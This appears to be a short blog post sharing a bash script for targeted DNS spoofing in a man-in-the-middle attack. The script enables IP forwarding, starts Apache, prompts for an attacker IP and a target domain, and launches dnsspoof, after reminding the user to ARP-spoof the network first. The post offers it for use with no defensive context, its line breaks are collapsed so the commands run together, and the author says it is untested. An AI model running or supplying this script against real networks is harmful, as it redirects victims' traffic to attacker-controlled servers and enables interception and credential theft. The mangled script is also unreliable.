It only spoofs the DNS for a specific URL.
This is better for a MITM attack.
(I should really test this first actually. Oh well....)
#!/bin/bashecho '1' > /proc/sys/net/ipv4/ip_forward/etc/init.d/apache2 startecho -e "REMEMBER TO PERFORM AN ARPSPOOF FIRST OTHERWISE THIS WILL NOT WORK!!!!!!"echo -e "Please enter your IP and the site you wish to target: EG: 192.168.0.2 www.bbc.co.uk"read INPUTDNSecho "$INPUTDNS" > dnsspooftxt.txtecho -e "Test file:\n\n"cat dnsspooftxt.txtecho -e "\n\n Are you using wlan0 or eth0?"read NICecho -e "You Chose:\n"echo -e "$NIC"echo -e "Starting DNS Spoof...."gnome-terminal -x dnsspoof -i "$NIC" -f dnsspooftxt.txt
No comments:
Post a Comment